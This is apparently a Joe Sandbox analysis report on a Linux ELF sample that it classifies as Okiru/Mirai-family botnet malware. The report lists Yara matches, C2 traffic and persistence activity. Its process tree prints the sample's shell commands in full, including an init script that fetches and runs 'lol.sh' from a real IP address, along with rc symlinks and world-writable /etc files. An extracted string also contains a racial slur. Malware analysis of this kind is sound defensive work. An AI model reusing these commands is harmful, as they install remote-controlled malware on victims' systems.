Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:	x86_32.nn.elf
Analysis ID:	1581264
MD5:	21dd74becf40d7fa78e56c5c0c66ff40
SHA1:	eb54e66334ad69a8beba62ea0b9891082a48a6b3
SHA256:	e85bc50197427182648d728ef66e05f1f0e96b4ed55148338df4bb32a0da257b
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	88
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample tries to set the executable flag

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581264
Start date and time:	2024-12-27 09:14:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	x86_32.nn.elf
Detection:	MAL
Classification:	mal88.spre.troj.evad.linELF@0/9@2/0

Runtime Messages

Command:	/tmp/x86_32.nn.elf
PID:	5515
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

x86_32.nn.elf (PID: 5515, Parent: 5434, MD5: 21dd74becf40d7fa78e56c5c0c66ff40) Arguments: /tmp/x86_32.nn.elf

x86_32.nn.elf New Fork (PID: 5526, Parent: 5515)

sh (PID: 5526, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 5535, Parent: 5526)

systemctl (PID: 5535, Parent: 5526, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

x86_32.nn.elf New Fork (PID: 5554, Parent: 5515)

sh (PID: 5554, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 5555, Parent: 5554)

chmod (PID: 5555, Parent: 5554, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

x86_32.nn.elf New Fork (PID: 5556, Parent: 5515)

sh (PID: 5556, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 5557, Parent: 5556)

ln (PID: 5557, Parent: 5556, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

x86_32.nn.elf New Fork (PID: 5558, Parent: 5515)

sh (PID: 5558, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

x86_32.nn.elf New Fork (PID: 5559, Parent: 5515)

sh (PID: 5559, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

sh New Fork (PID: 5560, Parent: 5559)

chmod (PID: 5560, Parent: 5559, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh

x86_32.nn.elf New Fork (PID: 5561, Parent: 5515)

sh (PID: 5561, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 5562, Parent: 5561)

mkdir (PID: 5562, Parent: 5561, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

x86_32.nn.elf New Fork (PID: 5563, Parent: 5515)

sh (PID: 5563, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

sh New Fork (PID: 5564, Parent: 5563)

ln (PID: 5564, Parent: 5563, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh

x86_32.nn.elf New Fork (PID: 5565, Parent: 5515)

x86_32.nn.elf New Fork (PID: 5567, Parent: 5565)

x86_32.nn.elf New Fork (PID: 5568, Parent: 5565)

udisksd New Fork (PID: 5527, Parent: 803)

dumpe2fs (PID: 5527, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5552, Parent: 5551)

snapd-env-generator (PID: 5552, Parent: 5551, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5577, Parent: 803)

dumpe2fs (PID: 5577, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5611, Parent: 803)

dumpe2fs (PID: 5611, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5641, Parent: 803)

dumpe2fs (PID: 5641, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x86_32.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
x86_32.nn.elf	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xe938:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
x86_32.nn.elf	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4988:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c5b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5945:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
x86_32.nn.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5a40:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
x86_32.nn.elf	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xf53b:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
x86_32.nn.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xa9d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
x86_32.nn.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xe58e:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
x86_32.nn.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xccf9:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
x86_32.nn.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xa9a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
5515.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xe938:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4988:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c5b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x5945:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5a40:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xf53b:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xa9d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xe58e:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xccf9:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
5515.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xa9a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Process Memory Space: x86_32.nn.elf PID: 5515	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: x86_32.nn.elf

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: x86_32.nn.elf

Joe Sandbox ML: detected

Source: x86_32.nn.elf

String: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s

Source: global traffic

TCP traffic: 192.168.2.14:51358 -> 94.156.227.234:38242

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: x86_32.nn.elf, 5515.1.00000000ffb29000.00000000ffb4a000.rw-.sdmp, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/

Source: ELF static info symbol of initial sample

.symtab present: no

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5515.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal88.spre.troj.evad.linELF@0/9@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_32.nn.elf (PID: 5515)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_32.nn.elf (PID: 5515)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5557)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 5564)	File: /etc/rc.d/S99sh -> /etc/init.d/sh	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_32.nn.elf (PID: 5515)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5555)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
